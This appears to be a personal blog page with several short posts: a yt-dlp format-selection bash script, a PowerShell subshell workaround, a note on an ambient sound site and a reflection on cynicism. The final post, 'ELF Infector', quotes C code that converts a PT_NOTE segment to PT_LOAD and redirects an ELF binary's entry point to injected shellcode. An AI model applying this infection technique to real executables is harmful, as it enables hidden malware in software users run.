14 March 2025

Paranoia, Some, Not Too Much, Mostly for Good

It's an amateur mistake to cultivate a mindset where you extrapolate the potential ulterior motives of your neighbors and every person you meet rather than trying to see their better traits. 

The way I see it, when we construct mental models of other people that include potentially false ulterior motives, what we are often really doing is preempting reality altogether—giving ourselves a free ticket to avoid the ordeal of having to truly understand them. It is easy to be cynical and reflexive. But being overly cynical is a kind of intellectual laziness. It is much harder to deliberately take the time and effort to think critically and ground your reasoning in evidence.

Is it good to be aware that we are all biological creatures with primal instincts, capable of ill deeds? Yes, of course it is. Is it good to acknowledge that we are also capable of living civilly, rationally, and prosperously among one another? Also yes.

Discernment may be tricky. It might be difficult. But the world is a place worth understanding.

12 March 2025

yt-dlp Archiving, Improved

One annoying thing about YouTube is that, by default, some videos are now served in .webm format or use VP9 encoding. However, I prefer storing media in more widely supported codecs and formats, like .mp4, which has broader support and runs on more devices than .webm files. And sometimes I prefer AVC1 MP4 encoding because it just works out of the box on OSX with QuickTime. And QuickTime doesn't natively support VP9/VPO9. And AVC1-encoded MP4s still seem more portable in general at the moment.

yt-dlp, the command-line audio/video downloader for YouTube videos, is a great project. But between YouTube supporting various codecs and compatibility issues with various video players, this can make getting what you want out of yt-dlp a bit more challenging:

$ yt-dlp -f "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best" https://www.youtube.com/watch?v=dQw4w9WgXcQ

For example, the format command above does not actually properly extract the best possible encodings for all YouTube urls on my OSX machine.

This usually happens in cases where a YouTube URL tries to serve a .webm file. If you were to try using the above format flag to attempt extracting the best quality mp4 compatible audio and video from a list of youtube urls -- and you come across a YouTube url that serves a .webm file -- yt-dlp won't error out, abort, or skip the url. Instead, yt-dlp will extract and generate video that's improperly encoded -- .mp4 files that cannot be opened or played.

However, we can fix this problem without even bothering yt-dlp with a pull request. Because yt-dlp does give us the capability to dump out all of the possible audio and video formats available for any video by using the -F flag:

$ yt-dlp -F "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
[youtube] Extracting URL: https://www.youtube.com/watch?v=dQw4w9WgXcQ
[youtube] dQw4w9WgXcQ: Downloading webpage
[youtube] dQw4w9WgXcQ: Downloading tv client config
[youtube] dQw4w9WgXcQ: Downloading player b21600d5
[youtube] dQw4w9WgXcQ: Downloading tv player API JSON
[youtube] dQw4w9WgXcQ: Downloading ios player API JSON
[youtube] dQw4w9WgXcQ: Downloading m3u8 information
[info] Available formats for dQw4w9WgXcQ:
ID  EXT   RESOLUTION FPS CH │   FILESIZE   TBR PROTO │ VCODEC          VBR ACODEC      ABR ASR MORE INFO
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
sb3 mhtml 48x27        0    │                  mhtml │ images                                  storyboard
sb2 mhtml 80x45        1    │                  mhtml │ images                                  storyboard
sb1 mhtml 160x90       1    │                  mhtml │ images                                  storyboard
sb0 mhtml 320x180      1    │                  mhtml │ images                                  storyboard
233 mp4   audio only        │                  m3u8  │ audio only          unknown             [en] Default
234 mp4   audio only        │                  m3u8  │ audio only          unknown             [en] Default
249 webm  audio only      2 │    1.18MiB   46k https │ audio only          opus        46k 48k [en] low, webm_dash
250 webm  audio only      2 │    1.55MiB   61k https │ audio only          opus        61k 48k [en] low, webm_dash
140 m4a   audio only      2 │    3.27MiB  130k https │ audio only          mp4a.40.2  130k 44k [en] medium, m4a_dash
251 webm  audio only      2 │    3.28MiB  130k https │ audio only          opus       130k 48k [en] medium, webm_dash
602 mp4   256x144     13    │ ~  2.04MiB   81k m3u8  │ vp09.00.10.08   81k video only
269 mp4   256x144     25    │ ~  3.95MiB  156k m3u8  │ avc1.4D400C    156k video only
160 mp4   256x144     25    │    1.78MiB   70k https │ avc1.4d400c     70k video only          144p, mp4_dash
...
//snipped

It turns out it's actually much better to first manually list the formats this way, use grep and awk to extract the best possible codecs for an mp4 file, and then run yt-dlp with the specifically related codecs for each video URL. Here's a Bash script to automate this process, which makes downloading stuff from YouTube easier, in my opinion:

#!/bin/bash

if [ -z "$1" ]; then
    echo "Usage: $0 <youtube_url>"
    exit 1
fi

url="$1"

processVideo() {
    local videoUrl="$1"

    echo "Fetching available formats for video: $videoUrl"
    formats=$(yt-dlp -F "$videoUrl")
    if [ $? -ne 0 ]; then
        echo "Error: Failed to fetch formats for $videoUrl. Is yt-dlp installed and the URL valid?"
        return
    fi

    videoFormat=$(echo "$formats" | grep 'mp4' | grep -E 'avc1' | \
    awk '{for (i=1; i<=NF; i++) if ($i ~ /k$/) tbr=$i; print $1, tbr}' | \
    sort -k2 -nr | awk '{print $1}' | head -1)

    if [ -z "$videoFormat" ]; then
        echo "No AVC1 video format found, falling back to any MP4 format."
        videoFormat=$(echo "$formats" | grep 'mp4' | \
        awk '{for (i=1; i<=NF; i++) if ($i ~ /k$/) tbr=$i; print $1, tbr}' | \
        sort -k2 -nr | awk '{print $1}' | head -1)
    fi

    audioFormat=$(echo "$formats" | grep 'm4a' | \
    awk '{for (i=1; i<=NF; i++) if ($i ~ /k$/) tbr=$i; print $1, tbr}' | \
    sort -k2 -nr | awk '{print $1}' | head -1)

    if [ -z "$videoFormat" ] || [ -z "$audioFormat" ]; then
        echo "Error: No compatible MP4 video or M4A audio formats found for $videoUrl!"
        return
    fi

    echo "Selected video format: $videoFormat [MP4 : AVC1 preferred]"
    echo "Selected audio format: $audioFormat [M4A : highest quality]"

    echo "Downloading video with yt-dlp..."
    yt-dlp --restrict-filenames \
    -f "${videoFormat}+${audioFormat}" \
    --merge-output-format mp4 "$videoUrl"

    if [ $? -ne 0 ]; then
        echo "Error: Failed to download video. Check the format IDs and URL."
    fi
}

isPlaylist() {
    if echo "$url" | grep -q "list="; then
        return 0 
    else
        return 1 
    fi
}

if isPlaylist; then
    echo "Processing playlist..."
    videoUrls=$(yt-dlp --flat-playlist --get-url "$url")

    if [ -z "$videoUrls" ]; then
        echo "Error: No videos found in the playlist. Is the URL correct?"
        exit 1
    fi

    for videoUrl in $videoUrls; do
        echo "Processing video: $videoUrl"
        processVideo "$videoUrl"
    done
else
    echo "Processing single video..."
    processVideo "$url"
fi

We grab the entire "available formats" table as input, storing it as plaintext in the $formats variable. We then grep $formats for 'mp4' listings, then grep again, further filtering for listings that use the AVC1 H.264 codec. If it doesn't find AVC1, we fall back to simply whatever is MP4 compatible. After filtering twice with grep, our list looks something like this:

269     mp4   256x144     30    | ~  1.71MiB  135k m3u8  | avc1.4D400C    135k video only
160     mp4   256x144     30    |  847.75KiB   66k https | avc1.4d400c     66k video only          144p, mp4_dash
230     mp4   640x360     30    | ~  7.14MiB  565k m3u8  | avc1.4D401E    565k video only
134     mp4   640x360     30    |    4.45MiB  353k https | avc1.4d401e    353k video only          360p, mp4_dash
18      mp4   640x360     30  2 | ≈  6.06MiB  481k https | avc1.42001E         mp4a.40.2       44k [en] 360p
232     mp4   1280x720    30    | ~ 30.28MiB 2396k m3u8  | avc1.64001F   2396k video only
//snipped

Then we use a for statement with awk and NF to loop through all of the fields, parsing the ID and TBR columns. The TBR column contains the bitrate. awk helps to extract the bitrate from the tbr table column, the first field the parser sees ending with a lowercase "k.":

awk '{for (i=1; i<=NF; i++) if ($i ~ /k$/) tbr=$i; print $1, tbr}'

At this point, our output looks something like this -- just a list of mp4 IDs and bitrates from our AVC1 list:

160 66k
230 565k
134 353k
232 2396k
//snipped

Afterward, we use sort to further select for the listing with the highest bitrate -- then awk and head -1 to ensure we print back only the ID of the mp4 video file listing with the highest bitrate.

sort -k2 -nr | awk '{print $1}' | head -1)

Our final output is just 232, the ID, which is what we pass to yt-dlp for the video portion of the download.

We repeat the process for the audio file listings by grepping for lines containing the m4a format extension. Again, we print the ID and TBR bitrate columns, sorting and extracting the related ID for the audio file with the highest bitrate.

We pass both the high quality video and audio IDs to yt-dlp for downloading. yt-dlp automagically merges these two files to produce a finalized MP4.

You could modify the grep and awk statements any other preferred video format, but this bash script works for downloading lectures I can natively watch and listen to on OSX.

10 March 2025

Subshells in Powershell

Previously, I wrote a post about how it's possible to create a "subshell" in Windows analogous to the subshell feature available in Bash on Linux—because Microsoft Windows doesn't actually have native subshell capability the same way that Linux does. The script below is an improvement on the same previous method of using the .NET System.Diagnostics trick. But this new version correctly redirects the standard output:

$x = New-Object System.Diagnostics.ProcessStartInfo
$x.FileName = "cmd.exe"
$x.Arguments = "/c echo %PATH%"
$x.UseShellExecute = $false
$x.RedirectStandardOutput = $true  
$x.EnvironmentVariables.Remove("Path")
$x.EnvironmentVariables.Add("PATH", "C:\custom\path")
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $x
$p.Start() | Out-Null
$output = $p.StandardOutput.ReadToEnd()
$p.WaitForExit()
Write-Output $output

Real-World Example

$customPath2 = "C:\custom\path\2"

$data = @{
    Path = $customPath2  
    Timestamp = Get-Date
    ProcessID = $PID  
}

$x = New-Object System.Diagnostics.ProcessStartInfo
$x.FileName = "cmd.exe"
$x.Arguments = "/c echo %PATH%"
$x.UseShellExecute = $false
$x.RedirectStandardOutput = $true
$x.RedirectStandardError = $true

$data["SubshellError"] = $stderr

$x.EnvironmentVariables.Remove("Path")
$x.EnvironmentVariables.Add("PATH", $customPath2)

$p = New-Object System.Diagnostics.Process
$p.StartInfo = $x
$p.Start() | Out-Null

$output = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd() 
$p.WaitForExit()

$data["SubshellOutput"] = $output
$data["SubshellError"] = $stderr

$data
> $data

Name                           Value
----                           -----
ProcessID                      11852
Path                           C:\custom\path\2
SubshellOutput                 C:\custom\path\2...
SubshellError
Timestamp                      3/10/2025 7:05:01 PM

03 March 2025

Ambiph.one

Today I learned about ambiph.one. This website is a minimalist ambient sound mixer for working, studying, or relaxing. Moreoever, all the sounds are either public domain or Creative Commons licensed. I've been using it while reading and writing code this Monday. Very neat.

02 March 2025

ELF Infector

Recently I wrote a blog post about infecting Executable and Linkable Format files on Linux. Specifically, a method that works on the latest Ubuntu 24.02.1 by altering PT_NOTE segments to PT_LOAD segments. You can find the source code here and a proof of concept demo on Youtube below:


    // Look for PT_NOTE section
    for (int i = 0; i < elf_header->e_phnum; i++) {
        if (program_headers[i].p_type == PT_NOTE) {
            // Convert to a PT_LOAD section with values to load shellcode
            printf("[+] Found PT_NOTE section\n");
            printf("[+] Changing to PT_LOAD\n");
            program_headers[i].p_type = PT_LOAD;
            program_headers[i].p_flags = PF_R | PF_X;
            program_headers[i].p_offset = file_offset;
            program_headers[i].p_vaddr = memory_offset;
            program_headers[i].p_memsz += sc_len;
            program_headers[i].p_filesz += sc_len;
            // Patch the ELF header to start at the shellcode
            elf_header->e_entry = memory_offset;
            printf("[+] Patched e_entry\n");
            break;
        }
    }

    // Patch shellcode to jump to the original entry point after finishing
    patch(&shellcode, &shellcode_len, elf_header->e_entry, original_entry);